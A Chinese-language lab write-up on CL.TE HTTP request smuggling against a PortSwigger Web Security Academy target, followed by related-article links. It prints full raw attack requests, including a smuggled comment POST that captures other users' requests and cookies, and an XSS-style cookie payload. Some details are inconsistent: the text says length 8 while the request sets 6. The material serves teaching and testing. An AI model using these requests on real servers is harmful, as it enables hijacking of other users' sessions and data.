CL.TE 简介

前端通过Content-Length处理请求,通过反向代理或者负载均衡将请求转发到后端,后端Transfer-Encoding优先级较高,以TE处理请求造成安全问题。

检测

发送如下数据包

POST / HTTP/1.1

Host: ac391f7e1e9af821806e890300db00d6.web-security-academy.net

Connection: close

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9,en;q=0.8

Cookie: session=

Content-Length: 6

Transfer-Encoding: chunked

0

P

CT长度为8,前端将body全发给后端,后端看到TE后读取到0\r\n\r\n后标志结束,P被留在缓冲区,等待下一次被请求。当再次请求下面的数据包

GET / HTTP/1.1

Host: ac391f7e1e9af821806e890300db00d6.web-security-academy.net

Connection: close

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9,en;q=0.8

Cookie: session=<img src=1 onerror=alert(1)>

P拼接到了下次请求变成

PGET / HTTP/1.1

Host: ac391f7e1e9af821806e890300db00d6.web-security-academy.net

Connection: close

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9,en;q=0.8

Cookie: session=<img src=1 onerror=alert(1)>

利用

1、由于在第二个包中可以加入HOST,我们可以通过添加HOST达到访问内部资源的目的。

2、劫持其他用户请求。找到一个类似评论,留言板的功能。

POST / HTTP/1.1

Host: ac391f7e1e9af821806e890300db00d6.web-security-academy.net

Connection: close

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9,en;q=0.8

Cookie: session=

Content-Length: 1031

Transfer-Encoding: chunked

0

POST /post/comment HTTP/1.1

Host: ac391f7e1e9af821806e890300db00d6.web-security-academy.net

Connection: close

Content-Length: 613

Cache-Control: max-age=0

Upgrade-Insecure-Requests: 1

Origin: https://ac391f7e1e9af821806e890300db00d6.web-security-academy.net

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Sec-Fetch-Site: same-origin

Sec-Fetch-Mode: navigate

Sec-Fetch-User: ?1

Sec-Fetch-Dest: document

Referer: https://ac391f7e1e9af821806e890300db00d6.web-security-academy.net/post?postId=3

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9,en;q=0.8

Cookie: session=1ikPLa6JOFOQBjoPp80gPhMC6uFFyiIa

csrf=m7WAHCgqovsgoj1rpIpRQXcANljAHsR8&postId=3&name=asf&email=asf%40qq.com&website=http%3A%2F%2Fbaidu.com%2Fa&comment=xxxx



注意CL一定要设置成正好将下一个数据包拼接过来的长度。等待其他用户访问网站时,比如下一个用户的数据包是下面这样。

GET / HTTP/1.1

Host: ac391f7e1e9af821806e890300db00d6.web-security-academy.net

Connection: close

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9,en;q=0.8

Cookie: session=<img src=1 onerror=alert(1)>

拼接后

POST / HTTP/1.1

Host: ac391f7e1e9af821806e890300db00d6.web-security-academy.net

Connection: close

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9,en;q=0.8

Cookie: session=

Content-Length: 1031

Transfer-Encoding: chunked

0

POST /post/comment HTTP/1.1

Host: ac391f7e1e9af821806e890300db00d6.web-security-academy.net

Connection: close

Content-Length: 613

Cache-Control: max-age=0

Upgrade-Insecure-Requests: 1

Origin: https://ac391f7e1e9af821806e890300db00d6.web-security-academy.net

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Sec-Fetch-Site: same-origin

Sec-Fetch-Mode: navigate

Sec-Fetch-User: ?1

Sec-Fetch-Dest: document

Referer: https://ac391f7e1e9af821806e890300db00d6.web-security-academy.net/post?postId=3

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9,en;q=0.8

Cookie: session=1ikPLa6JOFOQBjoPp80gPhMC6uFFyiIa

csrf=m7WAHCgqovsgoj1rpIpRQXcANljAHsR8&postId=3&name=asf&email=asf%40qq.com&website=http%3A%2F%2Fbaidu.com%2Fa&comment=xxxxGET / HTTP/1.1

Host: ac391f7e1e9af821806e890300db00d6.web-security-academy.net

Connection: close

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9,en;q=0.8

Cookie: session=<img src=1 onerror=alert(1)>

这样查看评论即可看到其他人的请求。

修复

  • 前后端处理请求采用同一种方式
  • 使用HTTP/2协议。

HTTP request smuggling CL.TE的更多相关文章

  1. Portswigger web security academy:HTTP request smuggling

    HTTP request smuggling 目录 HTTP request smuggling HTTP request smuggling, basic CL.TE vulnerability H ...

  2. 为什么一个Http Header中的空格会被骇客利用 - HTTP request smuggling

    figure:last-child { margin-bottom: 0.5rem; } #write ol, #write ul { position: relative; } img { max- ...

  3. Http Request Smuggling - Note

    http请求走私漏洞 访问Burp靶场速度感人..都要哭了(如果没有账户的先创建账户) 基础补充 pipeline http1.1有了Pipeline,就不需要等待Server端的响应了.浏览器默认不 ...

  4. 利用Haproxy搭建 HTTP 请求走私(Request smuggling)环境

    Haproxy 介绍 HAProxy是一个使用C语言编写的自由及开放源代码软件,其提供高可用性.负载均衡,以及基于TCP和HTTP的应用程序代理. 请求走私(Request smuggling)概念证 ...

  5. HTTP Request Smuggling 请求走私

    参考文章 浅析HTTP走私攻击 SeeBug-协议层的攻击--HTTP请求走私 HTTP 走私漏洞分析 简单介绍 攻击者通过构造特殊结构的请求,干扰网站服务器对请求的处理,从而实现攻击目标 前提知识 ...

  6. HTTP 请求夹带(smuggling)攻击

    什么是HTTP请求夹带(smuggling)攻击 HTTP请求走私是一种干扰网站处理从一个或多个用户接收的HTTP请求序列的方式的技术. 请求夹带漏洞危害,允许攻击者绕过安全控制,获取对敏感数据的未授 ...

  7. golang net之http server

    golang 版本:1.12.9 简单的HTTP服务器代码: package main import ( "net/http" ) type TestHandler struct ...

  8. 协议层安全相关《http请求走私与CTF利用》

    0x00 前言 最近刷题的时候多次遇到HTTP请求走私相关的题目,但之前都没怎么接触到相关的知识点,只是在GKCTF2021--hackme中使用到了 CVE-2019-20372(Nginx< ...

  9. [RoarCTF 2019]Easy Calc-协议层攻击之HTTP请求走私

    0X01:什么是HTTP请求走私 HTTP请求走私属于协议层攻击,是服务器漏洞的一种. HTTP请求走私是一种干扰网站处理从一个或多个用户接收的HTTP请求序列的方式的技术.使攻击者可以绕过安全控制, ...

随机推荐

  1. Ajax 下载文件 文件被损坏

    问题表现 Ajax 下载文件成功后,打开提示格式损坏,源代码如下: axios({ method: 'get', url: "/public/工作簿1.xlsx", // 静态资源 ...

  2. js基础练习题(4)

    9.对象 阅读代码,回答问题 function User(name) { var name1 = name; this.name2 = name; function getName1() { retu ...

  3. Format中的转换说明符

    %a(%A) 浮点数.十六进制数字和p-(P-)记数法(C99)%c 单个字符%d 有符号十进制整数%f 浮点数(包括float和doulbe)%e(%E) 指数形式的浮点数[e-(E-)记数法]%g ...

  4. LeetCode第29场双周赛题解

    第一题 用一个新数组newSalary保存去掉最低和最高工资的工资列表,然后遍历newSalary,计算总和,除以元素个数,就得到了平均值. class Solution { public: doub ...

  5. Python3-在windows快速运行一个简单的本地 HTTP 服务器

    1.打开控制台2.python -m http.server

  6. SELinux已经允许,为什么日志显示的仍然是denied?

    从日志可以看到,SELinux的Mode已经修改位了permissive = 1,也就是允许模式,但它前面的日志仍然显示的是“denied".本来我还以为是自己哪里没弄好导致的这个问题,但访 ...

  7. windows10 通过vnc远程访问ubuntu16.04

    参考链接 链接1 , 链接2 ,链接3 . 0.前言: 为方便深度学习训练,我们需要多个windows的电脑可以远程访问一个linux系统的工作站(以方便在linux系统上进行深度学习训练) 前提: ...

  8. 自定义PHPstorm快捷键

    这篇随笔介绍一下PHPstorm自定义快捷键的步骤: 1.点击主菜单 File 下的 setting : 2.在弹出框中点击 Keymap : 3.之后会出现如下图所示的界面(图中所有的菜单都折叠了) ...

  9. web页面弹出遮罩层,通过js或css禁止蒙层底部页面跟随滚动

    场景概述 弹窗是一种常见的交互方式,而蒙层是弹窗必不可少的元素,用于隔断页面与弹窗区块,暂时阻断页面的交互.但是,在蒙层元素中滑动的时候,滑到内容的尽头时,再继续滑动,蒙层底部的页面会开始滚动,显然这 ...

  10. activiti6基础01-如何数据库操作及相关表

    官网文档:https://www.activiti.org/userguide/#queryAPI 1. Activit的简单源码解读      activiti的官方文档讲解详细很详细,也很范.按着 ...